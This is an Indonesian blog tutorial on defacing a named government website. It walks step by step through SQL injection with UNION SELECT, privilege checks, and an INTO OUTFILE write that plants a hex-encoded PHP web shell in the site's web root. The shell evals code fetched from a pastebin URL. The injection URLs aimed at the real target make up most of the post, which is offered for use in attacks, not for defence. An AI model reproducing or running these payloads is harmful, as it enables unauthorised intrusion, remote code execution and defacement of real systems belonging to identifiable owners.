Deface Sql Into Output File

Selasa, 07 April 2020 1 Komentar

Assalamualaikum 

Udah lama gak Post tutor, Kali ini saya akan share pengetahuan saya tentang SQL INTO OUTPUT FILE

Langsung aja simak dan pahami

Target : http://pkk-kb-mabes.kotaprabumulih.go.id/

Sql Into Output File
Target Normal



Letak bug : http://pkk-kb-mabes.kotaprabumulih.go.id/?tampil=artikel_detail&id=14

Tambahkan string (') untuk mengetahui apakah web tersebut vuln

tambahkan string

Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in C:\xampp\htdocs\konten\artikel_detail.php on line 7
Itu Tandanya vuln,

Nahh, skrng kita tinggal cari anggka keberuntungannya.

http://pkk-kb-mabes.kotaprabumulih.go.id/?tampil=artikel_detail&id=-14%27+union+select+1,2,3,4,5,6--+-

cari anggka keberuntungan


Sekarang kita cek user nya dengan menambahkan user() Kalo usernya root@localhost berarti bisa di SQL

http://pkk-kb-mabes.kotaprabumulih.go.id/?tampil=artikel_detail&id=-14%27+union+select+1,user(),3,4,5,6--+-

cek user 

Sekarang Kita lanjut liat permission. Kalo tulisan nya Y berarti bisa di into output file, kalo tulisannya N berarti gak bisa :v

Cek permission


http://pkk-kb-mabes.kotaprabumulih.go.id/?tampil=artikel_detail&id=-14%27+union+select+1,file_priv,3,4,5,6+from+mysql.user--+-

Kalo semua sudah di cek. Saatnya kita Eksekusi target (upload shell).

Angka 2 tadi (lihat gambar angka keberuntungan) Kita ganti dengan shell pastebin yg sudah di ubah ke bentuk HEXADECIMAL, kalo gak punya pake punya gua jg boleh kok :v

0x3c3f706870206576616c28223f3e222e66696c655f6765745f636f6e74656e7473282268747470733a2f2f706173746562696e2e636f6d2f7261772f774b3962723336742229293b3f3e
Itu shell mini punya gua yang udah di ubah ke bentuk hexadecimal.

http://pkk-kb-mabes.kotaprabumulih.go.id/?tampil=artikel_detail&id=-14%27+union+select+1,0x3c3f706870206576616c28223f3e222e66696c655f6765745f636f6e74656e7473282268747470733a2f2f706173746562696e2e636f6d2f7261772f774b3962723336742229293b3f3e,3,4,5,6--+-

Shell itu tarok di angka keberuntungan target.

Di Belakang nya kita tambahin +into+outfile 'C:/home/user/public_html/
(lihat gambar tambahkan string)
Pada web yg akan di eksekusi.

http://pkk-kb-mabes.kotaprabumulih.go.id/?tampil=artikel_detail&id=-14%27+union+select+1,0x3c3f706870206576616c28223f3e222e66696c655f6765745f636f6e74656e7473282268747470733a2f2f706173746562696e2e636f6d2f7261772f774b3962723336742229293b3f3e,3,4,5,6+INTO+OUTFILE'C:/xampp/htdocs/konten/chuxp.php'--+-


Jika sudah tinggal panggil shell kalian di mana tempat kalian meletakkan shell nya.

Disini saya meletakan di belakang dir /konten. Jadi cara manggilnya


http://pkk-kb-mabes.kotaprabumulih.go.id/konten/chuxp.php




Sekian tutor.dari saya :v

Bye.


1 Komentar untuk "Deface Sql Into Output File"

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel